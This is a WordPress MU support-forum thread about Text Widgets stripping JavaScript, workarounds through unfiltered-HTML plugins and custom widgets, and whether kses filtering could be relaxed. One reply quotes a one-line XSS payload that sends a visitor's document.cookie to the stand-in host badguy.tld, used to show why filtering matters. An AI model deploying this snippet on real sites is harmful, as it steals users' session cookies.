WordPress MU

hi all,

i am having problems with the Text Widget. It works fine for a text but when i insert a code it does not apear on the front end. when i check out the text widget, the code was not saved.

is this a bug or have i done something dumb?

thanks

How about some specifics, links, copy of the code you're trying to add in, etc?

If the code you're placing in a text widget has *any* javascript in it - liek a webring code, Amazon stuff etc... - it WILL get stripped out as a security measure.

Best bet is to look for a wdiget that handles the code you're trying to paste in , or build your own widget to handle it.

thanks, your replies are very much appreciated.

andrea_r, yes the code i wanted to place is a javascript from entrecard. do u know any widget that allows me to paste codes?

cheers!

No, there's no widget that allows you to paste in codes. you'll have to find an entrecard widget or make one.

MU will strip out any and all javascript unless you do.

there are a couple of ways to do this. here are 2 that i've tried.

Thainy's hack

Someone coded an unfiltered widget

you could also use the unfiltered mu plugin which i can't seem to find right now.

I believ this is what you're thinking of:

http://wpmututorials.com/news/unfiltered-html-for-mu/

ahh, the power of google! From the site
Entrecard Me!
Vladimir on December 5th, 2007

Entrecard Me! will allow you to easily use Entrecard widget on your Wordpress Blog.

Is it possible to relax the kses to handle most of the real life need for JS and flash?

I might be really wrong here, but isn't the main security threat against which the filtering is done is cookie theft, and if JS is loaded from a different domain it is the browser's responsibility not to give access to the cookies? therefor there should not be any possible security breach if kses will allow the inclusion of JS with the <script src="otherdomain.com/file.js" /> syntax?

mark-k what about the following snippet:
<script>var img=new Image();img.src=\'http://badguy.tld/cookiecollect.php?c=\' document.cookie;</script>

From http://www.ush.it/2006/07/28/httponly-cookies-and-mozilla-firefox/

You could possibly filter out document.cookie but that's not a good way to go because someone's going to figure out a way around your code if you only blacklist, instead of the whitelisting we do now.

Donncha, I should have spelled out that no javascript protocol and embedded scripting should be allowed, just relax the rules for the self enclosed script tags.

I think that statistics services ask you to embed a JS in this way in order to provide richer data. I don't really have any strong knowledge for how many services this will be enough.

The more interesting part of my proposal is to implement the same for flash. If a flash file is loaded from another domain, what harm can it do?

"If a flash file is loaded from another domain, what harm can it do?"

Seriously?

As much or more harm than javascript, and javascript can neuter your site pretty quickly.

Lunabyte, are you suggesting that all the plugins which embed youtube are not secure because they embed flash?

In any case, I guess that you will agree that there are sites from which it is safe to load flash. It might be easier to maintain a white list of such sites then writing a plugin/widgets for all of them.

That's not what I'm saying.

What I am saying however is that once a user has permission to use embed, object, script, etc. tags without restraint, then you lose control of what is used as a source of those tags.

There will always be a user who whines a tune about "well you let this site, and this site is more popular but it's blocked". Etc., so an, and so forth.

Not to mention that once your site gets hacked, you realize it came from allowing these codes, and then you take it away, end users get rather upset.

Easiest method is to simply create a plugin. By doing so, you allow users to input the dynamic portion of the code (like the video id from youtube) in as a parameter (which should be sanitized and checked), then the plugin in turn spits out the correct code.

That gives you the functionality, but keeps the control in your hands.

But hey, it's your site, do whatever you want with it. That's cool, but when it gets hacked to bits one day, be prepared for a lot of "we told you so" comments. ;)

thanks demonicume

Ok, I am now running into this problem on my WpMu 2.6.3 site. One one of the blogs, EntreCard and AdSense works perfectly fine (via Text widgets). On another site, neither works (using the same theme template). Anyone care to guess why it would work on one blog and not another?

Site where the scripts are working: http://darkness.blog-now.net/

Site where the scripts are not working: http://chocolatekisses.blog-now.net/

In the mean time, I am using the EntreCard Me! Widget as a Text Box widget. Still, a viable (and simple) work-around for scripts in the text box widget would be welcomed.

Scripts in a text box widget, just make your own:

http://wpmututorials.com/plugins/build-your-own-widget/

Thanks Andrea. I was able to create the widget. However, when I add the widget to my sidebar and click on the "edit" link, there is no field to update the text. All that is displayed is a sentence saying "There are no options for this widget."

Here is a screen shot: http://uscommonsense.net/images/BAWscreenshot.jpg

I reviewed the code from the download file from your link above, and I do not see what might be causing the issue. Any tips?

Thanks again for your help. :)

Because that blank widget doesn't have those options built in. So if there's no options (which there isn't) then they won't show.

If you need options, then you'll have to look at another one I did and get the extra lines from there.

http://wpmututorials.com/plugins/so-easy-my-mom-can-use-it-the-image-badge-widget/